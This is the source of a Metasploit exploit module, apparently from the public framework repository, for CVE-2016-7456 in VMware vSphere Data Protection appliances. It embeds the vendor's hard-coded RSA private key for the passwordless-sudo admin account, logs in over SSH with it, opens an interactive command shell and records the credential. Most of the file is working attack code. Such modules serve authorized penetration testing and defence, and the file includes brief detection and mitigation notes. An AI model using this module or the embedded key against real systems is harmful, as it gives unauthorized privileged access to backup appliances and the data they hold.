GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
require 'net/ssh/command_stream'
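# Exploit for CVE-2016-7456: VMware vSphere Data Protection appliances ship a
# fixed RSA private key for the local +admin+ user (a passwordless sudoer), so
# anyone holding that key can log in over SSH. This module authenticates with
# the embedded key and hands the resulting command stream to the payload.
#
# Defender notes (derived from the module metadata below):
# - Detection: public-key SSH logins as +admin+ to a VDP appliance from hosts
#   that are not the usual management stations.
# - Mitigation: apply the vendor fix described in the advisory listed under
#   'References' (VMSA-2016-0024).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH
  include Msf::Auxiliary::Report

  # Local account the embedded key authenticates as on affected appliances.
  SSH_USER = 'admin'

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'VMware VDP Known SSH Key',
          'Description' => %q{
            VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.
          },
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          'Privileged' => true,
          'Targets' => [ [ 'Universal', {} ] ],
          'Payload' => {
            'Compat' => {
              'PayloadType' => 'cmd_interact',
              'ConnectionType' => 'find'
            }
          },
          'Author' => ['phroxvs'],
          'License' => MSF_LICENSE,
          'References' => [
            [ 'CVE', '2016-7456' ],
            [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ],
          ],
          'DisclosureDate' => '2016-12-20',
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
          'DefaultTarget' => 0,
          'Notes' => {
            'Stability' => [CRASH_SAFE],
            'Reliability' => [REPEATABLE_SESSION],
            'SideEffects' => []
          }
        }
      )
    )

    register_options(
      [
        # Since we don't include Tcp, we have to register these manually
        Opt::RHOST(),
        Opt::RPORT(22)
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  # Helper methods that normally come from the Tcp mixin, which this module
  # does not include (hence the manual Opt::RHOST / Opt::RPORT registration).
  #
  # @return [String] target host from the datastore
  def rhost
    datastore['RHOST']
  end

  # @return [Integer] target SSH port from the datastore
  def rport
    datastore['RPORT']
  end

  # Attempt a public-key SSH login as +SSH_USER+ using the embedded key.
  #
  # Every failure mode is reported with print_error before returning, so the
  # caller only needs to test the result for truthiness.
  #
  # @return [Net::SSH::CommandStream, nil, false] an interactive command
  #   stream on success; nil (or false) on any failure
  def do_login
    opt_hash = ssh_client_defaults.merge(
      auth_methods: ['publickey'],
      port: rport,
      key_data: [key_data]
    )
    # :debug is extremely verbose; only enable it on explicit request.
    opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']

    ssh_socket = nil
    begin
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh_socket = Net::SSH.start(rhost, SSH_USER, opt_hash)
      end
    rescue Rex::ConnectionError => e
      # Previously a silent return; report it like the other failure modes so
      # the operator can tell "unreachable" apart from "key rejected".
      print_error "#{rhost}:#{rport} SSH - Connection failed: #{e.message}"
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
      return
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    # Defensive: Net::SSH.start returned without raising but gave us nothing.
    return false unless ssh_socket

    # Wrap the established transport in a command stream, then drop the raw
    # socket from the module's socket list (presumably so the module's own
    # cleanup does not close a socket the session now owns — confirm).
    conn = Net::SSH::CommandStream.new(ssh_socket)
    sockets.delete(ssh_socket.transport.socket)
    conn
  end

  # Entry point: log in with the known key, record the credential in the
  # database, then hand the interactive command stream to the payload handler.
  #
  # @return [void]
  def exploit
    conn = do_login
    # do_login has already printed the reason for any failure.
    return unless conn

    print_good 'Successful login'
    report_known_key_login
    handler(conn.lsock)
  end

  # The vulnerability itself: the PEM-encoded RSA private key shipped on
  # affected appliances for the +admin+ account.
  #
  # @return [String] PEM private key (squiggly heredoc strips the indent)
  def key_data
    <<~EOF
      -----BEGIN RSA PRIVATE KEY-----
      MIICWQIBAAKBgQCx/XgSpdlvoy1fABui75RYQFTRGPdkHBolTNIAeA91aPfnAr2X
      /PuZR/DiHMCYcn6/8A5Jn75YOD3OL0mumJJR1uQ4pyhY+MSptiMYxhvDLIiRRo16
      9jewWCSH/7jqWH8NhImpVxt5SjWtKhQInTdPkG1dCj8oSn87bt8fKvLcVQIBIwKB
      gFuJq3dN+suzAWQOryCYeC1i6cqfICTbQKV39vjtScdajh8IuUbZ4Hq3SK7M9VW3
      Od8NvjR+Ch691qSNWRf2saWS5MHiaYGF3xWwZokbJWJWmxlQ+Di9QAyRkjDIuMCR
      Sj/vvCa6kWzZlSZWOyNbs38XkWoKXqVYwtnyXrINpZJTAkEA2p0ZrCKQTWBKt7aT
      Rvx/8xnoYu9hSXIG1k11ql0HZdRpmveuZe64Gl6oJtgBZMXNdvAds+gvGTVCSfBO
      c2ne0wJBANBt3t84oicWJpkzXnUBPOZdheKfAK6QO7weXiRmbILTJ5drPdu8pmxR
      c1uQJgYitaSNKglJmz2WNOoaPZz/7zcCQBj8Au8Z5Jsg8pinJsZIvippXGMUCx5W
      LKrHBiIZQqyNTeXTKd/DgsEvY6yq+NhRHsvDq5+IP+Wfr83vk+/u16MCQE1qozz3
      xzMW2yL10qB8zXoivLNCX1bH26xFyzIXaiH2qE4vJZrCabM0MilSzEtr+lMP3GnZ
      gs27cr1aNCRfD7UCQHOXGagsD/ijMGNcWPBQOY3foHzxozoBLGmysAmVz3vX6uyr
      Y7oq9O5vDxwpMOAZ9JYTFuzEoWWg16L6SnNVYU4=
      -----END RSA PRIVATE KEY-----
    EOF
  end

  private

  # Record the successful key-based login for the target service so the
  # credential is visible in the database (e.g. the `creds` command).
  #
  # @return [void]
  def report_known_key_login
    service_data = {
      address: rhost,
      port: rport,
      protocol: 'tcp',
      service_name: 'ssh',
      workspace_id: myworkspace_id
    }
    credential_data = {
      username: SSH_USER,
      private_type: :ssh_key,
      private_data: key_data,
      origin_type: :service,
      module_fullname: fullname
    }.merge(service_data)
    core = create_credential(credential_data)

    login_data = {
      core: core,
      # NOTE(review): the login-record API reads :last_attempted_at and
      # expects a :status; the original passed :last_attempted and no status,
      # which looks like it would be ignored / rejected on a live database —
      # confirm against the framework version in use.
      last_attempted_at: Time.now,
      status: Metasploit::Model::Login::Status::SUCCESSFUL
    }.merge(service_data)
    create_credential_login(login_data)
  end
end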